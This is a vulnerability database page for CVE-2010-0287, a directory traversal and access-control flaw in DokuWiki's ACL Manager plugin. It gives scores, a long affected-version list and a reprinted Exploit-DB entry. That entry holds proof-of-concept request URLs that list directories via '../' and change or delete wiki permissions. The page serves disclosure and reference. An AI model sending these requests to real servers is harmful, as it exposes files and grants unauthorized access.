CVE-2010-0287
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Directory traversal vulnerability in the ACL Manager plugin (plugins/acl/ajax.php) in DokuWiki before 2009-12-25b allows remote attackers to list the contents of arbitrary directories via a .. (dot dot) in the ns parameter.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:P/I:N/A:N | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 11141
Publication date : 2010-01-13 23h00 +00:00
Author : IHTeam
EDB Verified : Yes
Reported: 13-01-2010
Patched: 13-01-2010
Released: 14-01-2010
Vulnerable version :
http://www.splitbrain.org/_media/projects/dokuwiki/dokuwiki-2009-12-25.tgz
Patched version:
http://www.splitbrain.org/_media/projects/dokuwiki/dokuwiki-2009-12-25b.tgz
Author: white_sheep
Contact: [email protected] - https://www.ihteam.net
-------------------- Show Outside Directory
PoC :
http://server/plugins/acl/ajax.php?ajax=tree&ns=../pages/
The bug allows listing the names of arbitrary file on the webserver
- NOT THEIR CONTENTS.
-------------------- Arbitrary Change or Delete Wiki Permission
PoC :
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[save]=1&acl=(ACL)
add to acl.auth.php read or write authorization.
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[del]=1&acl=(ACL)
delete from acl.auth.php an eventually authorization like
(ACL).
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[update]=1&acl=(ACL)
delete from acl.auth.php all authorization like (ACL).
where (ACL) must be:
1 -> read
2 -> modified
4 -> creation
8 -> upload
16 -> delete
Products Mentioned
Configuraton 0
Dokuwiki>>Dokuwiki >> Version To (including) release_2009-02-14
- Dokuwiki>>Dokuwiki >> Version 2004-07-04 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-07-07 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-07-12 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-07-21 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-07-25 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-08-08 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-08-15a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-08-22 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-09-12 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-09-25 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-09-30 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-10-19 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-11-01 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-11-02 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2004-11-10 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2005-01-14 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2005-01-15 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2005-01-16 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2005-01-16a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2005-02-06 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2005-02-18 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2005-05-07 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2005-07-01 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2005-07-13 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2005-09-19 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2005-09-22 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2006-03-05 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2006-03-09 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2006-03-09e (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2006-06-04 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2006-11-06 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2007-06-26 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2007-07-13 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2008-05-04 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2008-05-05 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2009-02-14 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2009-02-14b (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2009-12-25 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2009-12-25c (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2010-11-07 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2010-11-07a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2010-11-07b (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2011-05-25 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2011-05-25a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2011-05-25c (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2011_05_25 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2011_05_25a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2012-01-25 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2012-01-25a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2012-01-25b (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2012-01-25c (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2012-10-13 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2013-05-10 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2013-05-10a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2013-12-08 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2013-12-08a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014-05-05 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014-05-05a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014-05-05b (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014-05-05c (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014-05-05d (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014-05-05e (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014-09-29 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014-09-29a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014-09-29b (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014-09-29c (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014-09-29d (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014_05_05c (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014_05_05d (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014_05_05e (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014_09_29b (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014_09_29c (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2014_09_29d (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2015-08-10 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2015-08-10a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2016-06-26 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2016-06-26a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2016-06-26b (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2016-06-26c (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2016-06-26d (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2016-06-26e (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2017-02-19 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2017-02-19a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2017-02-19b (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2017-02-19c (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2017-02-19d (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2017-02-19e (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2017-02-19f (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2018-04-22 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2018-04-22a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2018-04-22b (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2018-04-22c (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2020-07-29 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2020-07-29a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2022-07-31 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2022-07-31a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2022-07-31b (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2023-04-04 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version 2023-04-04a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version rc2009-01-30 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version rc2009-02-06 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-07-04 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-07-07 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-07-12 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-07-21 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-07-25 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-08-08 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-08-15a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-08-22 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-09-12 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-09-25 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-09-30 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-10-19 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-11-01 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-11-02 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2004-11-10 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2005-01-14 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2005-01-15 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2005-01-16a (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2005-02-06 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2005-02-18 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2005-05-07 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2005-07-01 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2005-07-13 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2005-09-19 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2005-09-22 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2006-03-05 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2006-03-09 (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2006-03-09e (Open CPE detail)
- Dokuwiki>>Dokuwiki >> Version release_2006-06-04 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-07-04
- Dokuwiki>>Dokuwiki >> Version 2004-07-04 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-07-07
- Dokuwiki>>Dokuwiki >> Version 2004-07-07 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-07-12
- Dokuwiki>>Dokuwiki >> Version 2004-07-12 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-07-21
- Dokuwiki>>Dokuwiki >> Version 2004-07-21 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-07-25
- Dokuwiki>>Dokuwiki >> Version 2004-07-25 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-08-08
- Dokuwiki>>Dokuwiki >> Version 2004-08-08 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-08-15a
- Dokuwiki>>Dokuwiki >> Version 2004-08-15a (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-08-22
- Dokuwiki>>Dokuwiki >> Version 2004-08-22 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-09-12
- Dokuwiki>>Dokuwiki >> Version 2004-09-12 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-09-25
- Dokuwiki>>Dokuwiki >> Version 2004-09-25 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-09-30
- Dokuwiki>>Dokuwiki >> Version 2004-09-30 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-11-01
- Dokuwiki>>Dokuwiki >> Version 2004-11-01 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-11-02
- Dokuwiki>>Dokuwiki >> Version 2004-11-02 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2004-11-10
- Dokuwiki>>Dokuwiki >> Version 2004-11-10 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2005-01-14
- Dokuwiki>>Dokuwiki >> Version 2005-01-14 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2005-01-15
- Dokuwiki>>Dokuwiki >> Version 2005-01-15 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2005-01-16a
- Dokuwiki>>Dokuwiki >> Version 2005-01-16a (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2005-02-06
- Dokuwiki>>Dokuwiki >> Version 2005-02-06 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2005-02-18
- Dokuwiki>>Dokuwiki >> Version 2005-02-18 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2005-05-07
- Dokuwiki>>Dokuwiki >> Version 2005-05-07 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2005-07-01
- Dokuwiki>>Dokuwiki >> Version 2005-07-01 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2005-07-13
- Dokuwiki>>Dokuwiki >> Version 2005-07-13 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2005-09-19
- Dokuwiki>>Dokuwiki >> Version 2005-09-19 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2005-09-22
- Dokuwiki>>Dokuwiki >> Version 2005-09-22 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2006-03-05
- Dokuwiki>>Dokuwiki >> Version 2006-03-05 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2006-03-09
- Dokuwiki>>Dokuwiki >> Version 2006-03-09 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2006-03-09e
- Dokuwiki>>Dokuwiki >> Version 2006-03-09e (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version 2006-06-04
- Dokuwiki>>Dokuwiki >> Version 2006-06-04 (Open CPE detail)
References
http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034729.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034831.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
2025©
tesweb SA
